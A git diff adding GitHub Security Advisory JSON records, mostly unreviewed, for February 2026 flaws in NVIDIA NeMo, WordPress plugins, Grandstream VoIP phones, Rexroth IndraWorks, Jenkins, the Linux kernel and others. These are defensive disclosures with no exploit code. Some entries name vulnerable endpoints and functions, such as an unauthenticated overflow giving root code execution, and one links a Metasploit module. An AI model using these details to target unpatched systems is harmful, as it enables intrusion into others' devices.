@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qq2v-q6qr-p5vx",
+ "modified": "2026-02-18T15:31:25Z",
+ "published": "2026-02-18T15:31:25Z",
+ "aliases": [
+ "CVE-2025-33251"
+ ],
+ "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33251"
+ },
+ {
+ "type": "WEB",
+ "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cve.org/CVERecord?id=CVE-2025-33251"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json
new file mode 100644
index 0000000000000..00126b1233e55
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq7g-427f-cm2r", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-1426" + ], + "details": "The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibility layer. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. 
Note: This vulnerability requires the Live Composer plugin to also be installed and active.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1426" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/502.html" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L25" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449344/#file418" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e76d57-217f-4f21-8bc6-a86290783a19?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json new file mode 100644 index 0000000000000..7f5cad051600a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json 
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r264-whc7-wwfw",
+ "modified": "2026-02-18T15:31:26Z",
+ "published": "2026-02-18T15:31:26Z",
+ "aliases": [
+ "CVE-2025-71226"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: Implement settime64 as stub for MVM/MLD PTP\n\nSince commit dfb073d32cac (\"ptp: Return -EINVAL on ptp_clock_register if\nrequired ops are NULL\"), PTP clock registered through ptp_clock_register\nis required to have ptp_clock_info.settime64 set, however, neither MVM\nnor MLD's PTP clock implementation sets it, resulting in warnings when\nthe interface starts up, like\n\nWARNING: drivers/ptp/ptp_clock.c:325 at ptp_clock_register+0x2c8/0x6b8, CPU#1: wpa_supplicant/469\nCPU: 1 UID: 0 PID: 469 Comm: wpa_supplicant Not tainted 6.18.0+ #101 PREEMPT(full)\nra: ffff800002732cd4 iwl_mvm_ptp_init+0x114/0x188 [iwlmvm]\nERA: 9000000002fdc468 ptp_clock_register+0x2c8/0x6b8\niwlwifi 0000:01:00.0: Failed to register PHC clock (-22)\n\nI don't find an appropriate firmware interface to implement settime64()\nfor iwlwifi MLD/MVM, thus instead create a stub that returns\n-EOPTNOTSUPP only, suppressing the warning and allowing the PTP clock to\nbe registered.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/81d90d93d22ca4f61833cba921dce9a0bd82218f"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/ff6892ea544c4052dd5799f675ebc20419953801"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T15:18:40Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json
new file mode 100644
index 0000000000000..0c7963d6b7ddd
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r4m3-cm43-fxrj",
+ "modified": "2026-02-18T15:31:27Z",
+ "published": "2026-02-18T15:31:27Z",
+ "aliases": [
+ "CVE-2026-2329"
+ ],
+ "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rapid7/metasploit-framework/pull/20983"
+ },
+ {
+ "type": "WEB",
+ "url": "https://firmware.grandstream.com/Release_Note_GXP16xx_1.0.7.81.pdf"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.grandstream.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T15:18:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json
new file mode 100644
index 0000000000000..bd2e0e158666f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r77x-pqm4-6252",
+ "modified": "2026-02-18T15:31:26Z",
+ "published": "2026-02-18T15:31:26Z",
+ "aliases": [
+ "CVE-2025-60037"
+ ],
+ "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60037"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json
new file mode 100644
index 0000000000000..c577f818717f0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rgjw-pqcr-56gf",
+ "modified": "2026-02-18T15:31:25Z",
+ "published": "2026-02-18T15:31:25Z",
+ "aliases": [
+ "CVE-2025-14340"
+ ],
+ "details": "Cross-site scripting in REST Management Interface in Payara Server <4.1.2.191.54, <5.83.0, <6.34.0, <7.2026.1 allows an attacker to mislead the administrator to change the admin password via URL Payload.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:X/RE:M/U:Red"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14340"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.payara.fish/enterprise/docs/Security/Security%20Fix%20List.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json
new file mode 100644
index 0000000000000..a0dc26782875f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rjm5-gmfm-6cp4",
+ "modified": "2026-02-18T15:31:27Z",
+ "published": "2026-02-18T15:31:27Z",
+ "aliases": [
+ "CVE-2026-2656"
+ ],
+ "details": "A flaw has been found in ChaiScript up to 6.1.0. This affects the function chaiscript::Type_Info::bare_equal of the file include/chaiscript/dispatchkit/type_info.hpp. This manipulation causes use after free. The attack requires local access. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2656"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ChaiScript/ChaiScript/issues/636"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ChaiScript/ChaiScript/issues/636#issue-3828333582"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ChaiScript/ChaiScript"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346454"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346454"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.752790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T15:18:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json
new file mode 100644
index 0000000000000..da27a8ec09d4a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rv75-v2gv-p54c",
+ "modified": "2026-02-18T15:31:25Z",
+ "published": "2026-02-18T15:31:25Z",
+ "aliases": [
+ "CVE-2025-33239"
+ ],
+ "details": "NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33239"
+ },
+ {
+ "type": "WEB",
+ "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cve.org/CVERecord?id=CVE-2025-33239"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json
index 819900c824fed..d660ca2f4621d 100644
--- a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json
+++ b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rvhp-mghq-8mvw", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70957" ], "details": "A Denial of Service (DoS) vulnerability was discovered in the TON Lite Server before v2024.09. The vulnerability arises from the handling of external arguments passed to locally executed \"get methods.\" An attacker can inject a constructed Continuation object (an internal TVM type) that is normally restricted within the VM. When the TVM executes this malicious continuation, it consumes excessive CPU resources while accruing disproportionately low virtual gas costs. This \"free\" computation allows an attacker to monopolize the Lite Server's processing power, significantly reducing its throughput and causing a denial of service for legitimate users acting through the gateway.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json new file mode 100644 index 0000000000000..94425dd4e91d3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vfmw-4jmp-wmrw",
+ "modified": "2026-02-18T15:31:26Z",
+ "published": "2026-02-18T15:31:26Z",
+ "aliases": [
+ "CVE-2025-60035"
+ ],
+ "details": "A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the OPC.Testclient.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60035"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json
new file mode 100644
index 0000000000000..248e19f7829d5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqcj-rgfw-jjcq", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23214" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject new transactions if the fs is fully read-only\n\n[BUG]\nThere is a bug report where a heavily fuzzed fs is mounted with all\nrescue mount options, which leads to the following warnings during\nunmount:\n\n BTRFS: Transaction aborted (error -22)\n Modules linked in:\n CPU: 0 UID: 0 PID: 9758 Comm: repro.out Not tainted\n 6.19.0-rc5-00002-gb71e635feefc #7 PREEMPT(full)\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\n RIP: 0010:find_free_extent_update_loop fs/btrfs/extent-tree.c:4208 [inline]\n RIP: 0010:find_free_extent+0x52f0/0x5d20 fs/btrfs/extent-tree.c:4611\n Call Trace:\n \n btrfs_reserve_extent+0x2cd/0x790 fs/btrfs/extent-tree.c:4705\n btrfs_alloc_tree_block+0x1e1/0x10e0 fs/btrfs/extent-tree.c:5157\n btrfs_force_cow_block+0x578/0x2410 fs/btrfs/ctree.c:517\n btrfs_cow_block+0x3c4/0xa80 fs/btrfs/ctree.c:708\n btrfs_search_slot+0xcad/0x2b50 fs/btrfs/ctree.c:2130\n btrfs_truncate_inode_items+0x45d/0x2350 fs/btrfs/inode-item.c:499\n btrfs_evict_inode+0x923/0xe70 fs/btrfs/inode.c:5628\n evict+0x5f4/0xae0 fs/inode.c:837\n __dentry_kill+0x209/0x660 fs/dcache.c:670\n finish_dput+0xc9/0x480 fs/dcache.c:879\n shrink_dcache_for_umount+0xa0/0x170 fs/dcache.c:1661\n generic_shutdown_super+0x67/0x2c0 fs/super.c:621\n kill_anon_super+0x3b/0x70 fs/super.c:1289\n btrfs_kill_super+0x41/0x50 fs/btrfs/super.c:2127\n deactivate_locked_super+0xbc/0x130 fs/super.c:474\n cleanup_mnt+0x425/0x4c0 fs/namespace.c:1318\n task_work_run+0x1d4/0x260 kernel/task_work.c:233\n exit_task_work include/linux/task_work.h:40 [inline]\n do_exit+0x694/0x22f0 kernel/exit.c:971\n do_group_exit+0x21c/0x2d0 kernel/exit.c:1112\n __do_sys_exit_group kernel/exit.c:1123 [inline]\n 
__se_sys_exit_group kernel/exit.c:1121 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1121\n x64_sys_call+0x2210/0x2210 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe8/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x44f639\n Code: Unable to access opcode bytes at 0x44f60f.\n RSP: 002b:00007ffc15c4e088 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\n RAX: ffffffffffffffda RBX: 00000000004c32f0 RCX: 000000000044f639\n RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001\n RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c32f0\n R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \n\nSince rescue mount options will mark the full fs read-only, there should\nbe no new transaction triggered.\n\nBut during unmount we will evict all inodes, which can trigger a new\ntransaction, and triggers warnings on a heavily corrupted fs.\n\n[CAUSE]\nBtrfs allows new transaction even on a read-only fs, this is to allow\nlog replay happen even on read-only mounts, just like what ext4/xfs do.\n\nHowever with rescue mount options, the fs is fully read-only and cannot\nbe remounted read-write, thus in that case we should also reject any new\ntransactions.\n\n[FIX]\nIf we find the fs has rescue mount options, we should treat the fs as\nerror, so that no new transaction can be started.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23214" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1972f44c189c8aacde308fa9284e474c1a5cbd9f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3228b2eceb6c3d7e237f8a5330113dbd164fb90d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a928eecf030a9a5dc5f5ca98332699f379b91963" + } + ], 
+ "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json new file mode 100644 index 0000000000000..16e327c5f4939 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw84-mx3m-hw5p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1404" + ], + "details": "The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the filter parameters (e.g., 'filter_first_name') in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1404" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/assets/js/um-members.js#L515" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members.php#L348" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458086" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ba62b804-f101-4e29-8304-fb2b7dad333c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json new file mode 100644 index 0000000000000..30189cc7dbd4c --- /dev/null 
+++ b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwcq-x7gx-g26f", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-8308" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Key Software Solutions Inc. INFOREX- General Information Management System allows XSS Through HTTP Headers.This issue affects INFOREX- General Information Management System: from 2025 and before through 18022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8308" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json new file mode 100644 index 0000000000000..1ca49c2294cfa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json 
@@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhp-qgm8-5p5c", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-27100" + ], + "details": "Jenkins 2.550 and earlier, LTS 2.541.1 and earlier accepts Run Parameter values that refer to builds the user submitting the build does not have access to, allowing attackers with Item/Build and Item/Configure permission to obtain information about the existence of jobs, the existence of builds, and if a specified build exists, its display name.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27100" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2026-02-18/#SECURITY-3658" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json new file mode 100644 index 0000000000000..239db0c71b690 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json 
